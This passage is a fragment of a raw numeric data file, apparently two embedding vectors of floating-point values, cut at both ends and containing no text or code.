.010977703,0.007455342,-0.020968832,0.0056677274,-0.02733254,0.019631002,0.0041488106,-0.00803219,-0.011893246,-0.029779121,-0.012341239,-0.012140634,-0.013406457,0.029054249,-0.000083674815,-0.0061527663,0.014936765,-0.003062594,0.001033054,0.006716385,-0.0075028143,-0.015840262,0.0027506447,0.0014932293,0.009518877,0.024597397,-0.018737065,0.009665968,-0.016187076,-0.0022189538,-0.017953862,0.026833694,0.013238482,-0.010830141,-0.007568433,0.018733444,-0.0072786845,-0.012221847,0.016058901,0.010129736,-0.016937274,0.03457538,0.011341804,0.0019221337,-0.0019043727,-0.01505981,0.015056177,-0.016929401,-0.0032891417,0.0058814595,-0.0022847822,-0.003677457,0.0143656805,-0.018003475,0.0064783455,-0.019426653,0.029737875,0.017207224,-0.0062446697,0.0135977985,0.023955202,0.005589855,-0.0008493115,-0.0046316604,0.0018145308,-0.027620742,-0.014983164,0.018137716,-0.022288961,0.0010980421,0.0027322161,0.028005362,-0.0025285294,-0.00844052,0.009793373,0.030562736,-0.02427176,0.0018430133,-0.01641277,-0.004725977,0.007834487,0.034560233,0.001090668,-0.011005684,0.0100400355,0.014587455,0.00852984,0.037533227,0.016113175,0.015355738,-0.00057715375,0.0067252065,0.013522039,0.0015829613,0.021611165,-0.013813869,0.012051672,-0.024630766,0.024791742,-0.013803523,0.0089694895,0.008926163,-0.0055968612,0.0010049905,-0.003710194,0.009562411,-0.02115566,0.0035025463,0.023198526,0.005985982,0.0032211738,0.0049498826,0.011183545,-0.02136728,-0.0019653449,0.012893292,-0.044342835,0.006530847,0.019353775,0.0019990806,-0.012631849,-0.007400163,-0.04964341,0.010540135,0.15925944,0.0040206793,0.004056103,0.024331883,0.021506272,0.0034372981,-0.13736106,-0.0074182316,-0.0013612086,0.0030748295,0.0013738445,-0.004563209,-0.0023093598,0.01308248,0.0048949,0.020508686,0.020204687,-0.028713314,0.0005375621,-0.011089811,0.0013073038,0.01101971,-0.01682109,0.004156635,-0.038009018,-0.011953015,0.01177571,-0.003263879,-0.0031205718,-0.014930248,0.00962603,-0.012030727,0.010130563,0.023361212,0.00079103874,0.012211495,0.026282135,0.028867612,-0.024154492,0.0129005425,0.010174739,-0.0046868017,-0.012950667,-0.021179533,-0.13759352,0.007161251,-0.008535423,-0.04684409,0.028137956,-0.014559112,0.0028257996,0.016598744,0.017737072,-0.012199327,0.0246845,0.027023556,0.004806271,0.0074728425,-0.023803081,-0.021379799,-0.001753254,-0.0036348035,0.011398443,0.00542979,-0.0016123023,-0.0136200525,-0.01013006,-0.013444743,-0.035140317,0.010274898,0.033852566,0.0137105165,-0.0038704583,0.005011243,0.0020913214,0.008455099,-0.02193659,0.029086046,0.0012898647,-0.0028272783,-0.027387667,0.010690673,0.0005447163,0.014856368,-0.0066654845,-0.005843585,-0.0038307498,-0.0018402064,0.0063045523,0.024640482,0.02845175,-0.002128934,0.016560264,-0.0062106494,0.018328687,-0.0147968065,-0.01880958,0.0050054984,-0.015804784,0.0021811519,-0.0069821524,-0.012624755,-0.008574552,0.01849904,-0.020108178,-0.017118564,-0.009745138,-0.018387953,0.023871727,-0.001936696,0.012669206,-0.03630394,0.0032775614,0.0076803365,-0.0012033901,0.0011471694,0.005605458,-0.031909216,0.013044628,0.013950846,-0.008657332,0.0032165954,0.0155443,-0.018061616,0.01917577,0.00517956,0.0006772179,-0.017528882,-0.0029595154,-0.0007019553,0.0037654813,0.030550085,-0.014753044,0.001901101,0.010630767,-0.004628924,0.024640758,0.0059517506,0.006586321,0.003899038,0.036578592,-0.01847161,-0.028191356,0.009550955,-0.009290017,-0.011526577,0.0024941207,-0.0020167993,0.0012191057,0.010860373,0.000029108267,-0.02448781,-0.019624906,-0.0054263305,0.0016895187,-0.016560405,0.026589949,0.013153688,-0.016572485,-0.0079654725,-0.0023989843,0.011105784,-0.006848184,0.006177692,-0.024788905,0.0101410225,-0.007893291,0.0036841235,0.040443312,0.020080268,-0.017543003,0.013090113,-0.004689074,0.0021980554,-0.0052638347,0.013832578,0.00623688,0.010316482,-0.0076120407,0.0034743699,-0.009602545,-0.0028381667,-0.017012417,-0.031107666,-0.007879842,0.019125568,-0.0026917278,-0.0054903617,-0.015289669,0.0027106607,0.047620498,-0.015265082,0.027812526,0.0026737927,0.0076824008,0.01243406,-0.021323312,-0.00016729691,0.013618364,0.062406596,-0.010971898,0.004398424,0.02866239,-0.01277623,-0.00083230395,0.032981206,-0.013260213,-0.027521977,-0.033032797,-0.002202249,0.009290013,-0.007685571,0.0106669,-0.023122637,0.029418956,-0.00208361,0.018642254,-0.015076042,0.030226395,0.016071904,-0.027328825,0.0062644402,0.020495843,0.0045634964,0.01422635,-0.0032925534,0.00792465,0.0034162574,-0.00007801034,-0.011079375,0.0023047123,0.00002544273,0.018332347,0.0095081255,-0.034227684,-0.0053582927,-0.0028737185,-0.004599235,-0.013094458,-0.00068735174,0.012515509,0.0128296465,-0.0024203532,0.00566946,-0.013857718,-0.026120117,0.008156963,0.02191435,-0.016109208,-0.009086814,0.0045744726,0.021657461,-0.0029923646,-0.0018580913,-0.0023922944,-0.008997103,-0.01062687,-0.0064788703,-0.012108401,0.025127647,-0.015740879,-0.026623758,-0.0018740965,-0.01775684,0.0035289882,0.000934544,0.010447742,-0.003288271,0.01451134,0.009825202,0.012894567,-0.004417902,0.007590624,-0.004792216,0.006112623,-0.029493669,-0.0024915836,-0.03593786,0.018997999,0.006894478,0.02430596,-0.003886479,0.0026447277,-0.010299394,-0.03778195,-0.009193036,0.0068918285,-0.015614619,-0.012338628,0.0048253876,0.002703827,0.010108175,0.0035935082,-0.016569166,0.01592418,0.02418394,0.004521591,0.007319778,0.010688465,0.023358088,0.0033839322,-0.025511565,-0.037144743,0.0008169918,-0.029254194,0.006357771,0.006300814,0.0008657696,-0.0025458434,0.013433796,-0.034628745,0.008368643,-0.03866361,-0.02490535,0.02070061,-0.035889793,-0.0016799303,0.0009892194,-0.0056116455,-0.0075621568,-0.0011417138,0.012099014,-0.005771687,0.037072763,-0.0103426995,-0.009938399,0.017237686,-0.034854546,0.0076840557,0.0029602328,0.019702252,0.0063620256,-0.004351882,-0.019483604,-0.009539263,-0.013699545,-0.014468633,0.008952514,0.0007086551,-0.009866607,-0.0012627102,-0.012615595,-0.0007876853,0.0152374245,-0.0043322155,0.013174412,-0.026981713,-0.026610132,0.015274638,0.008895219,0.0055838386,-0.007562047,-0.0022901078,0.011863979,0.00511733,-0.016924432,-0.016635183,-0.00842714,-0.031479508,0.011130567,0.03311167,0.018229404,-0.044897053,-0.003586142,-0.008625473,0.019608704,-0.007380196,0.014579946,0.0013767341,-0.0075714,-0.011790567,-0.0007613423,0.009353955,0.002613005,0.003357608,-0.0047092373,0.015408023,-0.00955303,-0.0065568765,0.0014677562,0.00914021,-0.013352027,-0.001794707,-0.00029950085,0.0007875199,0.005464478,0.04260117,-0.021832585,0.0066984296,0.0057114796,-0.008892913,-0.01753846,0.015612504,-0.019696582,-0.008763152,0.0045610634,-0.007774165,-0.0000010306711,0.00963255,0.008327692,-0.0026585483,-0.013238901,0.0039353953,-0.0043892944,-0.012507482,-0.003947039,-0.012610974,-0.008517715,0.017388415,-0.020895354,-0.00844247,-0.027225021,0.010368024,-0.015580763,-0.0027416754,-0.0026467992,0.032002635,0.0055140164,-0.020185381,0.01928809,-0.0025006395,0.006947339,-0.0018208002,0.004716269,0.0057634427,-0.01991167,0.037360646,-0.015862402,-0.008490723,0.022379953,0.03982197,0.024879945,0.008331912,-0.0056317667,-0.04260313,-0.012163948,-0.017753195,-0.040752377,0.003060605,-0.0011338465,-0.021642065,-0.026861737,0.01832248,0.010784842,0.021396074,-0.00052381586,0.013250083,0.0052091707,0.02171718,-0.0024486487,0.0066087525,-0.019361338,-0.009079518,0.008158165,-0.037328094,-0.0012742347,-0.007086631,-0.017565718,-0.032498803,-0.0048221946,-0.0013871647,-0.008170122,0.012465778,0.014479093,0.007339886,0.009347248,0.032688208,0.012737035,0.004568149,0.007127863,-0.0021032188,-0.010155902,0.0083995825,0.006602753,-0.0359394,0.018576851,-0.0018967243,0.024043081,0.011478028,0.03342072,-0.027023839,0.010000246,0.002214919,-0.0032078961,-0.018788217,0.0011816722,0.014411841,-0.015661556,0.0013588483,-0.011661326,0.025716068,0.016061217,-0.0054154564,-0.016377147,0.01500097,-0.0070988582,-0.011534337,0.015562026,0.007203636,-0.00062614033,0.0031265386,-0.024282796,0.02657721,0.0017221523,0.0020619694,0.051122144,0.00044321912,0.024027692,0.004895258,-0.01545504,-0.0020927486,-0.0017861192,0.0018285501,0.02547864,0.0012094505,0.0116709005,0.05027393,-0.028002286,0.0048117507,-0.025918236,0.011032619,-0.010903697,-0.008111797,-0.01588979,-0.003271602,-0.014596454,-0.030092455,-0.012696264,-0.022530034,0.00014458754,-0.0024254643,-0.0054647867,-0.13272737,-0.0013993628,-0.0288282,-0.021385122,-0.022161206,-0.013676024,0.023162737,0.011934156,0.011298159,-0.008720041,-0.023752248,0.02660402,0.014173137,0.01687265,0.014408163,0.0029228737,-0.028167445,-0.008858089,-0.00854354,0.0029163195,0.004750896,-0.034562886,-0.009028948,0.0017870863,0.0135775795,0.012331375,0.01409863,0.0076285657,0.02135735,0.010766923,-0.015214705,-0.00620541,0.02019094,0.020636432,0.029391237,-0.0033325194,0.026142836,-0.002185218,-0.010605595,0.008470168,-0.007877802,0.013831277,-0.0020170389,0.017206736,0.002520819,-0.010399459,0.0028059136,0.03862937,0.025606724,0.02187992,-0.016275546,0.032336593,0.008590876,-0.015146002,-0.00533031,-0.001945944,0.0067125815,-0.00753371,0.018360855,0.0040236237,-0.012987764,-0.007812911,-0.010804374,-0.0067916587,0.007847023,-0.004891737,-0.0087411795,0.007243861,-0.0046582688,0.005109627,-0.003967369,0.0064166626,0.0060651475,-0.014501246,-0.009914418,0.01850935,0.012287069,-0.012020574,0.009579914,0.031668372,-0.024936993,0.0030111985,0.0041767764,0.017241046,-0.011562572,-0.011507517,0.011328913,0.012669156,-0.01231838,-0.011460106,0.025312297,0.018497702,-0.012379772,-0.035217203,-0.00774467,-0.0012697452,0.007419966,0.014481283,-0.00698044,-0.0034271362,-0.02053919,-0.02002068,0.009389915,-0.03974268,-0.10150816,-0.021018324,0.035552528,0.009973967,0.0017939507,-0.015712615,0.0005195229,-0.00022997463,0.025172524,-0.008880818,0.012955848,0.016712872,0.0046197968,0.0070825135,0.03270981,0.021499231,-0.03528286,-0.010038489,-0.006937748,-0.0021599904,0.0059269993,0.014116507,0.008579794,0.020175293,-0.011261387,-0.010240435,0.0133511955,0.038017824,0.017911436,0.0073118457,-0.00028928864,-0.0029355674,0.0018602062,-0.011763241,-0.07150002,-0.0021601112,0.022009498,-0.005429,-0.014739155,0.018275866,-0.010706329,-0.016352324,0.009976363,0.014198724,-0.004129311,-0.0014177621,-0.01782259,0.008675733,-0.0141387535,-0.016113965,-0.017698932,0.007825098,-0.0030155526,-0.01869987,-0.008166303,-0.027949367,-0.005189209,0.013349437,-0.022629138,-0.008849608,0.0133617595,0.02549365,-0.010366763,0.01971974,0.000006355619,0.011162252,0.012218657,0.0056048366,-0.0104704825,0.009367827,0.000291638,0.029319774,0.019176343,-0.0021776424,0.024670348,-0.01531781,-0.0007476979,0.03760004,0.0064847334,0.0051517,-0.0138937915,0.0030132213,-0.018212503,0.00067552214,-0.042508796,0.013287518,-0.0011252956,0.002549268,-0.02798495,0.028008414,-0.011583092,-0.0021813335,0.013136054,0.027194478,0.02779234,0.0016198899,0.02967384,0.005844341,-0.02728758,-0.005562457,-0.016598074,-0.019317593,-0.0051143146,0.017916167,-0.01179387,0.01997675,0.028845472,0.008883236,-0.010778153,-0.011701708,0.0038618043,0.017606296,-0.008344426,-0.006446112,-0.005937393,0.017435458,0.005277044,-0.009739115,0.0043117986,0.0032777274,0.0016834517,-0.0102778375,0.013281831,0.003751422,0.0013950181,-0.0077996743,0.015297593,0.024437303,-0.0041865376,-0.017643822,0.009420573,-0.012183304,0.0063065933,-0.008215033,-0.004840587,0.013955925,-0.012151797,-0.0072528454,0.027661351,0.010018396,-0.00028630404,0.004610045,0.0098323,-0.012622636,-0.011902308,-0.0006840622,-0.01647952,-0.0073462594,-0.016605897,0.012131605,0.006485392,-0.01173253,0.0074895266,0.011109694,0.023642952,0.008305863,0.0044411113,-0.0003113698,0.001204486,0.016291913,-0.018143738,0.01608397,0.025694123,0.004795814,-0.006375582,-0.016512267,-0.012880924,0.019098047,-0.013375399,0.011394767,0.015885571,0.011608094,0.007983009,-0.031373724,0.012930976,-0.0126531515,0.00887044,0.024762588,0.01881024,0.007052704,-0.015693387,0.0020994884,-0.00863512,-0.008291502,-0.010028856,0.017646093,-0.02817732,-0.015074507,0.0112549355,-0.016365368,0.053726267,0.0022036636,-0.01931241,-0.0130691435,0.009923735,0.010438669,0.004723488,-0.020922832,-0.0016249077,-0.019650694,-0.020571886,0.00995365,-0.00047665057,-0.009752094,0.00020819128,0.0018364207,0.0031396393,0.038601104,0.009700764,-0.017538035,-0.013110705,0.026234472,-0.0028730049,-0.017038945,0.0129876835,0.0011388086,0.0054063243,-0.019246597,0.00088604126,0.0067190453,-0.008006911,-0.010364219,0.028518274,0.01150055,0.004946594,0.027000252,0.012997866,0.012606042,-0.048673853,-0.015101828,0.012108402,0.0017710188,-0.018223213,-0.017639626,0.02003725,-0.0067190416,0.018234946,0.011273572,-0.010432205,-0.0036272313,0.01752122,0.03379138,0.028111316,0.0019063348,0.006500422,0.010877155,0.030463712,0.012573762,0.029261794,0.045916285,-0.006440828,0.013093027,-0.008063922,0.0050704353,-0.024666585,0.0027358667,0.008048522,-0.0004451663,-0.0037201052,0.0054827887,-0.029749075,0.012169302,-0.019461475,-0.011881238,0.00634402,-0.0065960907,-0.0034061165,-0.014201863,-0.0017740496,0.0025380864,0.013811856,0.008728998,-0.0110720685,0.020700324,-0.021269742,-0.01797926,-0.00678442,0.021406401,0.013954284,0.01787911,0.01927649,0.0025498837,-0.009381618,0.020193547,-0.009552883,0.011466481,0.011429125,-0.0022573813,0.01953347,-0.0062100175,0.0008419901,-0.0016525794,-0.021031365,-0.010221819,-0.0107442485,0.010285792,0.012771197,-0.018366432,-0.017668879,0.0038318348,0.0012879781,-0.012361776,0.00023472562,-0.011445253,0.024482248,0.00083377067,-0.007923607,0.004371692,0.008913403,0.0015913683,-0.0046105827,0.01168048,-0.021203803,0.029801307,0.023629185,0.0095675085,-0.0020522685,-0.011770745,-0.038763884,-0.025259137,-0.009798663,-0.0051659634,0.010382879,-0.032317612,0.02725925,-0.016254969,-0.009563538,0.051865056,-0.014125333,0.0017476719,0.03524162,-0.030577652,-0.021954555,-0.012690745,0.038883068,-0.0063277017,0.0060438477,0.033182785,0.00013925921,0.02194273,0.010168769,0.007931461,-0.009210354,-0.007806213,0.009893356,0.0044448944,0.01232437,0.0022571166,0.0066685183,-0.008626219,-0.005503584,0.006246863,-0.00062307576,0.007867959,-0.016566666,0.034151673,-0.041704204,-0.008771862,-0.015810115,-0.018425267,-0.02513547,0.0030689184,0.0062388503,-0.0011082406,-0.014496064,-0.013772399,-0.031632256,0.008685283,0.006859411,0.025979321,0.0039735027,0.0010447886,-0.015310493,-0.015099656,-0.0151483035,-0.082784474,-0.0052183736,0.02279479,0.0018083091,0.030344537,0.003605664,0.01095233,0.007044241,0.011939359,-0.0010504249,0.0005233674,0.0056593847,-0.02578352,-0.015314889,0.015952427,-0.010760655,-0.023414891,0.01685636,-0.021545105,-0.034317326,-0.016180472,0.011186986,-0.0055289418,-0.012972525,0.01956127,0.0129683865,-0.0022913741,-0.025416734,0.011729119,-0.005483264,0.010978187,-0.02144447,-0.020763583,-0.005819281,-0.0035310953,0.0018383671,-0.018341249,-0.008653525,-0.0008587209,0.0104749575,-0.00060271675,-0.0070794565,0.0058771255,0.0019547036,-0.019983422,0.0032631068,-0.021672627,0.0050062705,-0.0042642234,0.01722536,-0.019206783,0.0071661468,-0.009955612,0.012551912,0.007837357,0.020247316,0.0055381623,-0.008585351,0.039664272,0.0030418565,-0.013959739,-0.0011846252,-0.013051866,0.0084127635,-0.00055547676,0.020890033,0.0028744186,0.010650112,0.0040397835,0.014595865,-0.0040479754,-0.022831483,-0.0126624545,0.005305915,-0.008805678,0.012975277,-0.0053015426,-0.016502885,-0.030152664,0.003490999,0.068268016,-0.007423783,0.0024794166,-0.0060571716,0.016898887,0.000088217166,-0.01625358,-0.010067679,0.035712305,0.016467443,0.027203105,-0.011634848,0.021306094,0.0033650543,0.0048094885,0.020827657,-0.0042809946,-0.007820871,0.0066982107,0.0015777615,0.024686873,-0.0015925642,-0.00011411288,-0.021401756,-0.031149315,-0.0020438328,-0.0055029183,-0.014461897,0.009882812,-0.0018393385,-0.0051617078,0.012411984,0.02254485,0.058108997,0.005823289,0.0058493526,0.014225824,0.020219801,-0.010623708,-0.020172305,-0.0033886333,-0.009781748,-0.014046794,0.03553825,-0.0038844096,-0.0130534135,0.004091868,0.010462265,-0.009990739,0.00030679125,-0.0026504393,0.008519791,0.024881724,0.0138160875,-0.01334524,0.015967136,-0.031384207,0.004705872,0.00081114477,0.027399,-0.01756069,-0.022339838,-0.0075601465,-0.012352702,-0.037391808,0.012405564,-0.005249168,0.0007038036,0.0017645488,-0.03395651,0.00094929524,0.0014252866,0.022397388,0.0008132695,-0.008055406,0.018185593,0.019196527,0.0077422773,-0.02866368,-0.013968533,-0.0018005933,0.016707953,0.014845202,-0.016389154,-0.0314102,0.0019777727,0.00361007,-0.013069264,0.012282423,-0.00077767286,-0.016773883,0.009795183,0.0094992425,-0.008775075,-0.012994112,-0.0021407066,0.026682073,0.016538793,-0.00843719,0.014134792,-0.009850626,0.014977614,-0.01242284,-0.0008427737,-0.0039397357,-0.01214031,0.0123805115,0.00004059076,0.0013624592,-0.00087914773,0.0026937907,0.0059856167,-0.03485645,0.0033290652,0.005680589,-0.0011212135,0.027334608,-0.008139065,-0.0064947293,-0.0015061236,-0.015865972,0.00025768246,-0.02069482,0.008403702,0.010696337,-0.0074710357,-0.0063787973,0.0013865937,-0.02086608,-0.005710851,0.0058091516,-0.013086464,0.015211661,0.12294126,0.00943067,0.006511802,-0.0017293799,0.020605141,0.0058361646,0.0011316657,-0.00610919,0.009066193,0.015256752,0.021101598,-0.010093202,0.01615102,-0.01519361,-0.0142228,0.01763083,0.0045540994,-0.013298776,-0.0042169625,0.0025094105,0.002168428,-0.027625153,-0.026283817,-0.06357579,-0.020884473,-0.06694292,0.029106569,0.006737414,-0.0037384508,0.017726326,-0.0048424727,-0.012072776,-0.0092766145,-0.00779029,-0.018369114,0.0077464865,-0.0042659068,-0.0021466468,-0.0011427567,-0.020209542,0.021462351,0.002104196,0.0071815494,-0.036774244,-0.004161625,-0.016461464,0.015462863,0.010027178,0.008835098,-0.0025938544,0.0016384169,0.004479465,0.015112482,-0.0007303638,0.012935771,-0.016446887,0.014968537,-0.0031871018,0.011419636,-0.00985102,-0.0078566065,-0.013796789,0.0067199925,-0.023121053,0.008765167,0.025652304,-0.015225869,0.0038980101,0.0016487972,0.000788265,0.03177471,-0.019357165,-0.0012589975,0.011042634,0.0012266755,0.012177453,-0.0065077585,-0.007106161,-0.0035652416,-0.00043975573,-0.005389882,-0.003179062,0.0106510855,0.0069987006,0.025160564,0.015475527,-0.021645857,0.016345186,0.00079791667,0.0016476843,-0.019766048,0.025327347,0.030042855,-0.0060844696,0.002657335,0.011765179,0.038684506,0.017093986,-0.022517841,0.007654557,-0.02486721,-0.0074424,0.00915736,0.007217361,-0.00047653745,-0.0030100902,0.009961483,0.008107899,-0.0051037716,0.0025529112,0.008620079,0.03096138,-0.0030981782,0.016905949,-0.0043807053,0.03211429,-0.029598925,-0.013465183,0.0031158598,-0.012495686,-0.006562444,0.01580728,0.039012175,0.027004851,0.0047496953,0.009733595,0.0014094714,-0.0035223104,0.006646689,-0.009987293,0.0020716852,-0.029195273,0.01361356,0.0094498,-0.009677231,0.01022792,0.02114132,-0.00096291717,0.0066431975,-0.008547657,0.021952938,-0.0064863553,-0.0068827067,-0.026100453,0.023211172,-0.023333576,0.03786379,-0.004139542,0.0054874397,-0.0075137457,-0.0047606477,0.0039309957,-0.0050517735,-0.014875534,-0.016186403,0.011263791,-0.033210367,0.00095816236,0.0005109259,-0.00997914,0.015156888,-0.0014672593,0.019554636,-0.029007008,0.017860813,0.014758587,0.00038753872,-0.006391025,0.02865691,0.009573066,0.013197133,-0.0011863252,0.015563199,-0.0025764152,-0.02234957,0.023060715,0.009928243,0.0149182165,0.0016904494,0.005977014,0.0048729647,0.018339187,0.0022414352,-0.006700615,0.038539495,0.0116749015,0.0016090699,0.012197561,-0.006490311,0.047379285,-0.010370227,-0.024418555,0.00022302323,0.01446472,-0.007216025,0.013136743,-0.035556577,0.027032634,-0.030617828,-0.04733306,-0.0034017093,-0.015204523,0.016100872,-0.0038549486,-0.0018645105,-0.025094133,-0.009188978,-0.0058016824,-0.0034674709,-0.011829639,0.013291341,-0.00659764,0.00914582,-0.014087391,-0.01000302,0.0075300196,-0.010351894,-0.015850265,-0.010681299,0.014838769,-0.0096193515,0.0019633353,-0.011806338,-0.017420033,-0.013932035,0.004580514,0.002737443,-0.004550271,0.0031452242,-0.01006451,-0.0137483245,0.012405212,-0.0034125515,-0.010441123,0.00022285683,-0.0057112146,0.03854138,0.004874147,0.0005857556,-0.010499906,-0.0072699236,0.012723012,0.018288415,-0.019758858,-0.039536703,0.01258574,-0.0033341069,0.004799046,-0.006794495,-0.0015783589,-0.014926864,-0.0020953983,-0.002904425,-0.011973335,-0.011018857,-0.012169583,-0.0022435891,0.026609136,0.014221122,-0.007931447,0.011473042,0.0059738425,0.0011247355,0.024216931,0.0013821649,0.01381774,0.0055879727,-0.014464382,0.011865319,-0.0044276975,-0.024931807,-0.0027738228,-0.016753051,0.028232448,-0.002125574,0.00060913403,0.0123547325,0.006926838,0.0071104183,-0.030738674,0.009982595,-0.012869472,0.002808302,0.0015548295,-0.0064386395,-0.0065095094,-0.015697662,0.005698308,0.055416808,-0.064849645,-0.0028442494,0.0059917835,-0.00325789,-0.027116219,0.016677016,0.00037504308,-0.032819074,-0.026635503,0.0235925,0.013403674,0.0016592933,-0.03477289,-0.0057774163,0.0017070754,-0.009702789,0.006902845,0.008782965,-0.006229165,-0.023568884,0.0068501397,-0.011310906,-0.00035385948,0.0029928214,0.004333132,-0.00664415,0.0021834136,0.0025007618,-0.011094133,0.029352102,0.00509983,0.007811444,-0.022661204,-0.0020593056,-0.00068477803,0.008965017,0.01992776,-0.012002454,-0.028509425,-0.037213117,-0.02172331,-0.020933334,0.008885164,0.015416128,-0.0005152066,-0.007311023,0.025114497,-0.014093879,0.11365304,-0.019119797,-0.0050561978,0.012116792,0.00015504919,-0.009740483,0.004900425,0.031634625,0.011421422,0.013442709,-0.016975902,-0.006001976,0.010841384,0.025235819,-0.014426591,0.007709468,-0.0018951374,0.10876961,-0.009686807,0.02873613,0.014560489,0.011101198,0.0066794762,0.018893495,0.015150948,-0.08173888,-0.0020674302,-0.029727083,0.015424758,-0.00858879,-0.030233638,0.0046301275,-0.0033323679,0.013847287,-0.014427332,0.020652324,0.023979183,0.0096273115,-0.024525266,-0.02093637,-0.0069801477,0.001900391,-0.015019,-0.003823818,-0.014236001,0.0017865736,-0.036503606,0.016669372,0.014777724,0.029958937,0.0046613924,-0.0021470704,0.026045356,-0.0093440935,-0.010048093,0.015715979,-0.004680281,0.006252778,-0.024482384,-0.00664246,-0.040569812,0.009729394,-0.0005401054,0.03266749,-0.0131880725,-0.007814711,-0.02288357,0.0103035085,0.019652233,0.018001981,0.020700125,0.02365144,-0.016121924,0.013457307,-0.003759433,0.0037400974,-0.005154056,-0.013988798,0.025983052,-0.011236771,0.02723306,-0.008273131,-0.00788024,0.020782141,0.010200517,0.042025026,0.0056528756,-0.010887113,0.02088855,-0.010059978,-0.0004164377,0.011681154,0.0035696754,0.012495819,0.005550442,0.017290438,0.004085108,-0.006764703,-0.0026392112,-0.018492889,-0.0108485585,0.011017626,0.010944767,0.012601923,0.014720248,0.007296158,-0.0019703722,-0.018107895,0.00056579406,0.016294073,-0.008350727,-0.005056581,0.004882167,0.032165416,0.008156808,-0.011342171,-0.008672884,-0.0020789315,-0.031781636,-0.014628648,-0.008505917,0.014502054,-0.0036156434,0.017713124,-0.024873931,-0.0035777106,0.01610798,0.033535767,-0.004403738,-0.014441528,0.0177962,0.0016121154,0.041444942,0.06889656,0.0027194738,-0.01922984,0.015607506,-0.01457121,-0.028297402,-0.00045895347,0.0078167375,0.007917806,0.018612692,0.008759964,-0.009575697,-0.018289983,0.0021310907,-0.02160328],[0.0014293451,-0.021770956,-0.024031283,-0.0056859613,0.010987139,-0.022317776,0.018261908,0.01624208,0.00018684169,-0.015169722,-0.0069713807,0.019029006,0.0023873653,0.002056536,-0.003192448,0.0017891985,0.009310839,-0.0017890921,-0.010313216,-0.012577617,0.00069202855,-0.009061272,0.016590357,-0.017998936,0.013505534,-0.017362928,-0.01156338,0.000023862685,-0.0011888752,0.027868917,0.01058248,0.00816742,0.0074447063,-0.0013004354,0.01993167,0.017466275,-0.017321886,-0.027792742,0.006694525,-0.002799131,-0.015270977,0.012755128,0.007725898,0.029138057,-0.014848797,-0.009835607,-0.0049052183,0.0128636295,-0.018659608,0.011322888,-0.0044269245,-0.01703954,-0.027153991,0.010554312,-0.015445905,0.01661915,0.0014840942,-0.030245636,0.025366167,0.010104176,-0.006708756,0.021630995,0.00010339758,-0.024028907,0.022361573,0.0034392015,0.004814633,-0.008886095,-0.015179519,-0.025280403,-0.004364638,-0.009985426,-0.0020729434,0.0031844275,0.01748116,0.015676526,-0.005257171,-0.02338189,-0.0075941337,0.012453524,-0.034337766,-0.0076330584,-0.00024148605,-0.0029366496,-0.001599813,0.0049857083,-0.025229543,0.0013913468,-0.0060992246,-0.023267752,-0.00007533606,-0.014127931,-0.00391072,0.011130015,-0.013852122,0.019646486,0.010321718,0.0032592367,-0.0082181245,0.010910785,-0.006040782,-0.0018192929,-0.023076,0.006421897,0.0055094524,-0.0120934425,-0.0023215706,-0.0012634278,-0.023148961,0.0020197828,-0.017010042,0.013580676,0.003866873,-0.015537231,-0.005238026,0.0035009868,0.013678685,0.007727964,-0.007602648,-0.008597372,-0.010901153,0.038571898,-0.0021310865,-0.007831663,-0.0053504617,-0.0031426037,-0.009147296,0.01853747,0.01563048,-0.002056545,-0.011743684,0.0148405805,0.010905797,-0.004491979,0.0075478917,-0.007996209,-0.0034563649,-0.005052486,0.010487669,-0.02423135,0.006934299,-0.005516489,0.00813295,0.000009556809,0.012373429,0.031313013,-0.006999987,0.032301217,-0.003374297,0.0006801343,0.0065508275,-0.011525731,0.005575709,-0.015773937,0.016887624,0.02561117,0.008440488,-0.029438538,-0.0123843355,-0.016912885,-0.008579136,0.013874129,0.0066445214,-0.0062764655,-0.030083407,-0.017208707,-0.0039513637,-0.0140795875,-0.012280814,-0.01091459,0.020646594,0.037171837,0.019715125,0.012926114,-0.00044670835,0.019941416,0.024249224,-0.014491198,-0.014867019,0.0005116632,0.013228899,0.014180288,0.006144313,-0.012439444,0.001826395,0.021325495,-0.0047190627,-0.009063703,-0.010398035,-0.0046665613,0.0021172862,-0.011399423,-0.002201398,0.0030107356,-0.025614899,-0.021929666,-0.023877135,0.121492565,-0.005560443,-0.0033597867,-0.026884845,0.006266766,0.00655707,-0.043106094,-0.019572848,-0.0030138595,-0.010043874,-0.006486707,0.023716379,0.010544814,0.012886585,-0.003954906,-0.0029010528,0.014379697,-0.011139315,-0.071194835,0.010602858,0.026568752,0.005050442,-0.014387409,-0.024100997,0.013722041,0.0034491837,-0.03875597,-0.019491045,-0.0027710367,-0.001573064,0.003768338,0.004958285,-0.024439268,0.004562674,0.01109233,-0.017630326,-0.023818694,0.003914013,-0.014827543,0.008319186,-0.010576623,0.0023211972,-0.0012658272,-0.002724232,0.007926123,0.0052599595,0.030369602,-0.02310662,-0.0016932631,0.011839426,0.013301917,-0.012350748,0.024736702,0.00993665,-0.0017017744,-0.0020509607,0.02765019,-0.012216656,-0.009204178,0.022622913,-0.010996668,-0.008268352,-0.0005844569,0.021897811,0.015037823,-0.010211156,0.03084192,0.05173241,0.01731687,0.014191675,-0.031688225,-0.009141469,0.00072575227,-0.029613445,-0.0031702314,0.005872637,0.0043025343,0.009987928,-0.014490449,0.029766686,0.0014249475,-0.012109361,-0.0038268894,-0.0010445999,0.0064653154,0.0000030787462,-0.018524442,0.0046230312,0.0044564498,-0.004670291,0.016384037,0.02823878,0.006938666,0.006258961,-0.0031016038,0.021908298,0.009567455,-0.0083564315,-0.019594418,-0.02572736,0.019207552,0.011667346,-0.02146113,0.0075401515,-0.0021241335,0.022448903,0.0061910884,-0.0019348552,-0.003238286,-0.003408033,0.030902455,-0.012469085,0.0020942295,-0.021773595,-0.009497502,-0.022874067,0.014360582,0.016159954,0.0035364968,0.0041529355,-0.017471306,-0.020487718,-0.0050617605,0.022774046,-0.026537962,0.0030762032,-0.012798621,-0.022001158,-0.007732782,0.01661178,0.0015518729,0.012523968,0.007644479,-0.012508633,0.009836796,0.010457165,0.017171605,-0.0014101712,0.031418838,-0.018177632,0.016917616,0.014316372,0.013196691,-0.022103444,-0.01318472,-0.021200493,0.014085936,-0.0021218683,-0.0030580915,-0.0075929416,0.0021386016,0.02464344,0.016103892,0.012305911,-0.034696747,0.0076958975,0.0010313638,-0.012777281,0.0027292515,-0.0064753816,-0.0064062593,0.013785051,-0.023677034,0.02372252,-0.016789654,0.0046858764,0.013813308,0.08860016,0.01241134,0.0028523372,0.008371646,-0.014094092,-0.0046156053,0.02181539,0.015701294,0.0013681441,0.010595907,-0.008417048,-0.03167615,-0.0045215627,0.014056116,-0.015